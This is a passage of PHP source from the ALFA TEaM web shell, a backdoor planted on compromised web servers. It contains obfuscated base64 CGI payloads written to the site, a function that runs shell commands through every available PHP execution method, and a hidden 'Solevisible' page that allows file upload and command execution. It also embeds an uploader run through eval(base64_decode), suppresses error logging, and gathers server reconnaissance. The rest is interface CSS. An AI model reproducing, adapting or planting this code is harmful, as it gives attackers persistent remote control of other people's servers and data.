650 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
651 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
652 alfaWriteTocgiapi($lang.".alfa",$source);
653 alfacgihtaccess('cgi', "alfacgiapi/");
654 }else{
655 $lang = $_COOKIE["alfacgiapi"];
656 }
657 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
658 if($is_curl){
659 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
660 $post = new AlfaCURL();
661 $data = $post->Send($address, "post", $cmd);
662 }elseif($is_socket){
663 $server = $_SERVER["SERVER_NAME"];
664 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
665 $data = _alfa_fsockopen($server,$uri,$cmd);
666 }
667 $out = "";
668 if(strstr($data, "[solevisible~api]")){
669 if($set_cookie){
670 __alfa_set_cookie("alfacgiapi", $lang);
671 }
672 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
673 $out = $res[1];
674 }
675 }elseif($lang=="perl"){
676 return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
677 }elseif($lang=="py"){
678 return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
679 }else{
680 if($set_cookie){
681 __alfa_set_cookie("alfacgiapi_mode", "off");
682 }
683 }
684 return trim($out);
685 }else{
686 return "";
687 }
688}
689function alfaEx($in,$re=false,$cgi=true,$all=false){
690 $data = _alfa_php_cmd($in,$re);
691 if(empty($data)&&$cgi||$all){
692 if($GLOBALS['sys']=='unix'){
693 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
694 $cmd = _alfa_cgicmd($in);
695 if(!empty($cmd)){
696 return $cmd;
697 }
698 }
699 }
700 }
701 return $data;
702}
703function _alfa_php_cmd($in,$re=false){
704$out='';
705try{
706if($re)$in=$in." 2>&1";
707if(function_exists('exec')){
708@exec($in,$out);
709$out = @join("\n",$out);
710}elseif(function_exists('passthru')) {
711ob_start();
712@passthru($in);
713$out = ob_get_clean();
714}elseif(function_exists('system')){
715ob_start();
716@system($in);
717$out = ob_get_clean();
718} elseif (function_exists('shell_exec')) {
719$out = shell_exec($in);
720}elseif(function_exists("popen")&&function_exists("pclose")){
721if(is_resource($f = @popen($in,"r"))){
722$out = "";
723while(!@feof($f))
724$out .= fread($f,1024);
725pclose($f);
726}
727}elseif(function_exists('proc_open')){
728$pipes = array();
729$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
730$out=@stream_get_contents($pipes[1]);
731}elseif(class_exists('COM')){
732$alfaWs = new COM('WScript.shell');
733$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
734$stdout = $exec->StdOut();
735$out=$stdout->ReadAll();
736}
737}catch(Exception $e){}
738return $out;
739}
740function _alfa_fsockopen($server,$uri,$post){
741 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
742 if($socket){
743 $http = "POST {$uri} HTTP/1.0\r\n";
744 $http .= "Host: {$server}\r\n";
745 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
746 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
747 $http .= "Content-length: " . strlen($post) . "\r\n";
748 $http .= "Connection: close\r\n\r\n";
749 $http .= $post . "\r\n\r\n";
750 fwrite($socket, $http);
751 $contents = "";
752 while (!@feof($socket)) {
753 $contents .= @fgets($socket, 4096);
754 }
755 list($header, $body) = explode("\r\n\r\n", $contents, 2);
756 @fclose($socket);
757 return $body;
758 }else{
759 return "";
760 }
761}
762if(isset($_GET["solevisible"])){
763@error_reporting(E_ALL ^ E_NOTICE);
764echo '<html>';
765echo "<title>Solevisible Hidden Shell</title>";
766echo "<body bgcolor=#000000>";
767echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
768$safe_mode = @ini_get('safe_mode');
769if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
770echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
771echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
772echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
773echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
774echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
775echo"<font color=#7CFC00>Disable functions : </font>";
776$disfun = @ini_get('disable_functions');
777if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
778echo"<font color=red>";
779echo "$disfun";
780echo"</font><br>";
781echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
782echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
783echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
784echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
785if(isset($_FILES['file'])){
786if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
787else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
788}
789echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
790<hr><pre>';
791if(isset($_POST['command_solevisible'])){
792if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
793$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
794echo alfaEx($solevisible);
795}
796echo'</pre>
797</body></html>';
798exit;}
799@error_reporting(E_ALL ^ E_NOTICE);
800@ini_set('error_log',NULL);
801@ini_set('log_errors',0);
802@ini_set('max_execution_time',0);
803@ini_set('magic_quotes_runtime', 0);
804@set_time_limit(0);
805if(function_exists('set_magic_quotes_runtime')){
806@set_magic_quotes_runtime(0);
807}
808foreach($_POST as $key => $value){
809if(is_array($_POST[$key])){
810$i=0;
811foreach($_POST[$key] as $f) {
812$f = trim(str_replace(' ', '+',$f));
813$_POST[$key][$i] = decrypt_post($f);
814$i++;
815}
816}else{
817$value = trim(str_replace(' ', '+',$value));
818$_POST[$key] = decrypt_post($value);
819}
820}
821$default_action = 'FilesMan2';//'FilesMan';
822$default_use_ajax = true;
823$default_charset = 'Windows-1251';
824if(strtolower(substr(PHP_OS,0,3))=="win")
825$GLOBALS['sys']='win';
826else
827$GLOBALS['sys']='unix';
828$GLOBALS['home_cwd'] = @getcwd();
829$GLOBALS["need_to_update_header"] = "false";
830$GLOBALS['glob_chdir_false'] = false;
831if(isset($_POST['c'])){
832if(!@chdir($_POST['c'])){
833 $GLOBALS['glob_chdir_false'] = true;
834}
835}
836$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@getcwd());
837if($GLOBALS['glob_chdir_false']){
838 $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @getcwd());
839}
840if($GLOBALS['sys'] == 'win'){
841$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
842$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
843}
844if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
845if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
846define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
847function alfahead(){
848$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
849$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
850define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
851if(!isset($_POST['ajax'])){
852function Alfa_GetDisable_Function(){
853$disfun = @ini_get('disable_functions');
854$afa = '<span class="header_show_all">All Functions Accessible</span>';
855if(empty($disfun))return($afa);
856$s = explode(',',$disfun);
857$s = array_unique($s);
858$i=0;
859$b=0;
860$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
861$black_list = array();
862$allow_list = array();
863foreach($s as $d){
864 $d=trim($d);
865 if(empty($d)||!is_callable($d))continue;
866 if(!function_exists($d)){
867 if(in_array($d,$func)){
868 $dis .= $d." | ";$b++;
869 $black_list[] = $d;
870 }else{
871 $allow_list[] = $d;
872 }
873 $i++;
874 }
875}
876if($i==0)return($afa);
877if($i <= count($func)){
878$all = array_values(array_merge($black_list, $allow_list));
879return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
880}
881return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
882}
883function AlfaNum(){
884$args = func_get_args();
885$alfax = array();
886$find = array();
887for($i=1;$i<=10;$i++){
888$alfax[] = $i;
889}
890foreach($args as $arg){
891$find[] = $arg;
892}
893echo '<script>';
894foreach($alfax as $alfa){
895if(in_array($alfa,$find))
896continue;
897echo 'alfa'.$alfa."_=";
898}
899echo '""</script>';
900}
901if(empty($_POST['charset']))
902$_POST['charset'] = $GLOBALS['default_charset'];
903$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
904$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
905$totalSpace = $totalSpace?$totalSpace:1;
906$on="<span class='header_on'> ON </span>";
907$of="<span class='header_off'> OFF </span>";
908$none="<span class='header_none'> NONE </span>";
909if(function_exists('ssh2_connect'))
910$ssh2=$on;
911else
912$ssh2=$of;
913if(function_exists('curl_version'))
914$curl=$on;
915else
916$curl=$of;
917if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
918$mysql=$on;
919else
920$mysql=$of;
921if(function_exists('mssql_connect'))
922$mssql=$on;
923else
924$mssql=$of;
925if(function_exists('pg_connect'))
926$pg=$on;
927else
928$pg=$of;
929if(function_exists('oci_connect'))
930$or=$on;
931else
932$or=$of;
933if(@ini_get('disable_functions'))
934$disfun=@ini_get('disable_functions');
935else
936$disfun="All Functions Enable";
937if(@ini_get('safe_mode'))
938$safe_modes="<span class='header_off'>ON</span>";
939else
940$safe_modes="<span class='header_on'>OFF</span>";
941$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
942if(@ini_get('open_basedir')){
943$basedir_data = @ini_get('open_basedir');
944if(strlen($basedir_data)>120){
945$open_b=substr($basedir_data,0, 120)."...";
946}else{
947$open_b = $basedir_data;
948}
949}else{$open_b=$none;}
950if(@ini_get('safe_mode_exec_dir'))
951$safe_exe=@ini_get('safe_mode_exec_dir');
952else
953$safe_exe=$none;
954if(@ini_get('safe_mode_include_dir'))
955$safe_include=@ini_get('safe_mode_include_dir');
956else
957$safe_include=$none;
958if(!function_exists('posix_getegid'))
959{
960$user = function_exists("get_current_user")?@get_current_user():"????";
961$uid = function_exists("getmyuid")?@getmyuid():"????";
962$gid = function_exists("getmygid")?@getmygid():"????";
963$group = "?";
964}else{
965$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
966$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
967$user = $uid['name'];
968$uid = $uid['uid'];
969$group = $gid['name'];
970$gid = $gid['gid'];
971}
972$cwd_links = '';
973$path = explode("/", $GLOBALS['cwd']);
974$n=count($path);
975for($i=0; $i<$n-1; $i++) {
976$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
977$cach_cwd_path = "";
978for($j=0; $j<=$i; $j++){
979$cwd_links .= $path[$j].'/';
980$cach_cwd_path .= $path[$j].'/';
981}
982$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
983}
984$drives = "";
985foreach(range('a','z') as $drive)
986if(@is_dir($drive.':\\'))
987$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
988$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
989echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
990<html xmlns="http://www.w3.org/1999/xhtml">
991<head>
992<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
993<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
994<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
995<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..</title>
996<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
997<style type="text/css">
998.hlabale {
999 color: #67ABDF;
1000 border-radius: 4px;
1001 border: 1px solid #27979B;
1002 margin-left: 7px;
1003 padding: 2px;
1004}
1005#tbl_sympphp tr {
1006 text-align: center;
1007}
1008.view_ml_content,#PhpCode,.php-evals-ace {
1009 position: absolute;
1010 top: 0;
1011 right: 0;
1012 bottom: 0;
1013 left: 0;
1014 background: #1b292b26;
1015 top: 50px;
1016}
1017.editor-view {
1018 position: relative;
1019 height: 100%;
1020}
1021.view-content {
1022 position: absolute;
1023 overflow-y: auto;
1024 width: 100%;
1025 height: 93%;
1026}
1027*::-webkit-scrollbar-track {
1028 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
1029 border-radius: 10px;
1030 background-color: #000115;
1031}
1032*::-webkit-scrollbar{
1033 width: 10px;
1034 background-color: #000115;
1035}
1036*::-webkit-scrollbar-thumb {
1037 border-radius: 10px;
1038 -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
1039 background-color: rgb(30, 130, 181);
1040}
1041.editor-file-name {
1042 margin-left: 29px;
1043 margin-top: 4px;
1044 overflow: hidden;
1045 text-overflow: ellipsis;
1046 white-space: nowrap;
1047}
1048.editor-icon {
1049 position: absolute;
1050}
1051.is_active {
1052 background: rgba(49, 55, 93, 0.77);
1053 border-radius: 10px;
1054}
1055.history-list {
1056 height: 88%;
1057 overflow-y: auto;
1058}
1059.opt-title {
1060 position: absolute;
1061 left: 50%;
1062 top: 50%;
1063 transform: translate(-50%, -50%);
1064 color: #2fd051;
1065 font-size: 25px;
1066 font-family: monospace;
1067}
1068.options_min_badge {
1069 visibility: hidden;
1070 text-align: center;
1071 right: 30px;
1072 color: white;
1073 background: #2a8a24;
1074 padding: 6px;
1075 border-radius: 50%;
1076 width: 15px;
1077 height: 15px;
1078 display: inline-block;
1079 position: absolute;
1080 top: -7px;
1081}
1082#editor-minimized,#cgiloader-minimized,#options_window-minimized,#database_window-minimized {
1083 display: block;
1084 position: fixed;
1085 right: -30px;
1086 width: 30px;
1087 height: 30px;
1088 top: 30%;
1089 z-index: 9999;
1090}
1091.minimized-wrapper {
1092 position: relative;
1093 background: rgb(14, 48, 74);
1094 width: 44px;
1095 height: 130px;/*167px;*/
1096 cursor: pointer;
1097 border-bottom-left-radius: 5px;
1098 border-top-left-radius: 5px;
1099}
1100.minimized-text {
1101 transform: rotate(-90deg);
1102 color: wheat;
1103 font-size: x-large;
1104 display: inline-block;
1105 position: absolute;
1106 right: -51px;
1107 width: 129px;
1108 top: -10px;
1109 border-top-left-radius: 4%;
1110 height: 56px;
1111 padding: 3px
1112}
1113.close-button,.editor-minimize {
1114 height: 26px;
1115 width: 38px;
1116 right: 7px;
1117 background: rgb(29, 86, 115);
1118 cursor: pointer;
1119 position: absolute;
1120 box-sizing: border-box;
1121 line-height: 50px;
1122 display: inline-block;
1123 top: 17px;
1124 border-radius: 100px;
1125}
1126.editor-minimize {right: 50px;}
1127.close-button:before,.close-button:after,.editor-minimize:before {
1128 transform: rotate(-45deg);
1129 content: "";
1130 position: absolute;
1131 top: 63%;
1132 right: 6px;
1133 margin-top: -5px;
1134 margin-left: -25px;
1135 display: block;
1136 height: 4px;
1137 width: 27px;
1138 background-color: rgba(216, 207, 207, 0.75);
1139 transition: all 0.25s ease-out;
1140}
1141.editor-minimize:before{
1142 transform: rotate(0deg);
1143}
1144.close-button:after {
1145 transform: rotate(-135deg);
1146}
1147.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
1148 background-color: red;
1149}
1150.close-button:hover,.editor-minimize:hover{
1151 background-color: rgba(39, 66, 80, 0.96);
1152}
1153#editor,#cgiloader,#options_window,#database_window {
1154 display: none;
1155 position: fixed;
1156 top: 0;
1157 width: 100%;
1158 height: 100%;
1159 z-index: 20;
1160}
1161.editor-wrapper {
1162 width: 100%;
1163 height: 100%;
1164 position: relative;
1165 top: 1%;
1166}
1167.editor-header {
1168 width: 97%;
1169 background: rgba(21, 66, 88, 0.93);
1170 height: 37px;
1171 margin-left: 13px;
1172 position: relative;
1173 border-top-left-radius: 15px;
1174 border-top-right-radius: 15px;
1175}
1176.editor-path {
1177 position: absolute;
1178 font-size: x-large;
1179 margin-left: 10px;
1180 top: 6px;
1181 color: springgreen;
1182}
1183.editor-modal {
1184 position: relative;
1185 top: 0;
1186 background-color: rgba(0, 1, 23, 0.95);
1187 height: 90%;
1188 margin-left: 20%;
1189 margin-right: 2%;
1190 border: 2px #0e304a solid;
1191}
1192.editor-explorer {
1193 width: 19%;
1194 height: 90%;
1195 background-color: rgba(0, 1, 23, 0.94);
1196 position: absolute;
1197 z-index: 2;
1198 left: 1%;
1199 border: 2px rgb(14, 48, 74) solid;
1200}
1201.editor-controller {
1202 position: relative;
1203 top: -13px;
1204}
1205.file-holder {
1206 position: relative;
1207 width: 100%;
1208 height: 30px;
1209}
1210.file-holder > .history {
1211 position: absolute;
1212 color: rgb(3, 179, 163);
1213 cursor: pointer;
1214 left:5px;
1215 font-size: 18px;
1216 font-family: sans-serif;
1217 width:89%;
1218 height:100%;
1219 z-index: 3;
1220 border-radius: 10px;
1221 transition: background-color 600ms ease-out;
1222}
1223.file-holder > .history-close {
1224 display: block;
1225 opacity: 0;
1226 position: absolute;
1227 right: 2px;
1228 width: 20px;
1229 top: 4px;
1230 text-align: center;
1231 cursor: pointer;
1232 color: white;
1233 background: red;
1234 border-radius: 100px;
1235 font-family: monospace;
1236 z-index: 10;
1237 transition: opacity 600ms ease-out;
1238 font-size: 15px;
1239 height: 19px;
1240}
1241.file-holder > .history:hover {
1242 background-color: #646464;
1243}
1244.editor-explorer > .hheader {
1245 position: relative;
1246 color: rgb(20, 255, 7);
1247 border-bottom: 2px rgb(32, 106, 162) solid;
1248 text-align: center;
1249 font-family: sans-serif;
1250 margin-bottom: 10px;
1251 height: 55px;
1252}
1253.editor-search {
1254 position: absolute;
1255 bottom: 7px;
1256 left: 31px;
1257}
1258.hheader-text {
1259 position: absolute;
1260 left: 8px;
1261 top: 2px;
1262}
1263.history-clear {
1264 position: absolute;
1265 right: 8px;
1266 top: 2px;
1267 cursor: pointer;
1268}
1269.editor-body {
1270 position: relative;
1271 margin-left: 3px;
1272 height: 100%;
1273}
1274.editor-anim-close {
1275 '.showAnimation("editorClose").'
1276}
1277@keyframes editorClose {
1278 0% {
1279 visibility: 1;
1280 opacity: 1;
1281 }
1282 100% {
1283 visibility: 0;
1284 opacity: 0;
1285 }
1286}
1287.editor-anim-minimize {
1288 '.showAnimation("editorMinimize").'
1289}
1290@keyframes editorMinimize {
1291 0% {
1292 right:0px;
1293 opacity: 1;
1294 }
1295 100% {
1296 right: -2000px;
1297 opacity: 0;
1298 }
1299}
1300.editor-anim-show {
1301 '.showAnimation("editorShow").'
1302}
1303@keyframes editorShow {
1304 0% {
1305 right:-2000px;
1306 opacity: 0;
1307 }
1308 100% {
1309 right: 0px;
1310 opacity: 1;
1311 }
1312}
1313.minimized-show {
1314 '.showAnimation("minimizeShow").'
1315}
1316@keyframes minimizeShow {
1317 0% {
1318 right: -30px;
1319 opacity: 0;
1320 }
1321 100% {
1322 right: 0px;
1323 opacity: 1;
1324 }
1325}
1326.minimized-hide {
1327 '.showAnimation("minimizeHide").'
1328}
1329@keyframes minimizeHide {
1330 0% {
1331 right: 0px;
1332 opacity: 1;
1333 }
1334 100% {
1335 right: -30px;
1336 opacity: 0;
1337 }
1338}
1339.solevisible-text:hover {
1340 -webkit-text-shadow: 0px 0px 25px #00FF00;
1341 -moz-text-shadow: 0px 0px 25px #00FF00;
1342 -ms-text-shadow: 0px 0px 25px #00FF00;
1343 text-shadow: 0px 0px 25px #00FF00;
1344}
1345.update-holder {
1346 position: fixed;
1347 top: 0;
1348 background-color: rgba(0, 24, 29, 0.72);
1349 width: 100%;
1350 height: 100%;
1351}
1352.update-content {
1353 position: relative;
1354}
1355.update-content > a {
1356 text-decoration: none;
1357 position: absolute;
1358 color: rgba(103, 167, 47, 0.77);
1359 left: 24%;
1360 margin-top: 7%;
1361 font-size: 40px;
1362 font-family: "Francois One", sans-serif;
1363}
1364.update-close {
1365 position: absolute;
1366 right: 0;
1367 margin-right: 23px;
1368 top: 10px;
1369 font-size: 27px;
1370 background-color: #130f50;
1371 width: 5%;
1372 border-radius: 100px;
1373 cursor: pointer;
1374 border: 2px rgb(14, 38, 90) solid;
1375}
1376.update-close:hover {
1377 border: 2px #25ff00 solid;
1378 color: #FF0000;
1379}
1380.filestools {
1381 height: auto;
1382 width: auto;
1383 color: #67ABDF;
1384 font-size: 12px;
1385 font-family: Verdana,Geneva,sans-serif;
1386}
1387@-moz-document url-prefix() {
1388 #search-input {
1389 width: 173px;
1390 }
1391 .editor-path {
1392 top:3px;
1393 }
1394}
1395.filters-holder {
1396 padding: 5px;
1397 padding-left: 10px;
1398}
1399.filters-holder input {
1400 width: 200px;
1401}
1402.filters-holder span {
1403 color: #8bc7f7;
1404}
1405#rightclick_menu {
1406 width: 175px;
1407 visibility: hidden;
1408 opacity: 0;
1409 position: fixed;
1410 background: #0f304a;
1411 color: #555;
1412 font-family: sans-serif;
1413 font-size: 11px;
1414 -webkit-transition: opacity .5s ease-in-out;
1415 -moz-transition: opacity .5s ease-in-out;
1416 -ms-transition: opacity .5s ease-in-out;
1417 -o-transition: opacity .5s ease-in-out;
1418 transition: opacity .5s ease-in-out;
1419 -webkit-box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1420 -moz-box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1421 box-shadow: -1px 0px 17px 0px rgb(139, 139, 140);
1422 padding: 0px;
1423 border: 1px solid #737373;
1424 border-radius: 10px;
1425}
1426
1427#rightclick_menu a {
1428 display: block;
1429 color: #fff;
1430 font-weight: bolder;
1431 text-decoration: none;
1432 padding: 6px 8px 6px 30px;
1433 position: relative;
1434 padding-left: 40px;
1435}
1436
1437#rightclick_menu a img,
1438#rightclick_menu a i.fa {
1439 height: 20px;
1440 font-size: 17px;
1441 width: 20px;
1442 position: absolute;
1443 left: 5px;
1444 top: 2px;
1445 padding-left: 5px;
1446}
1447
1448#rightclick_menu a span {
1449 color: #BCB1B3;
1450 float: right;
1451}
1452
1453#rightclick_menu a:hover {
1454 color: #fff;
1455 background: #3879D9;
1456}
1457
1458#rightclick_menu hr {
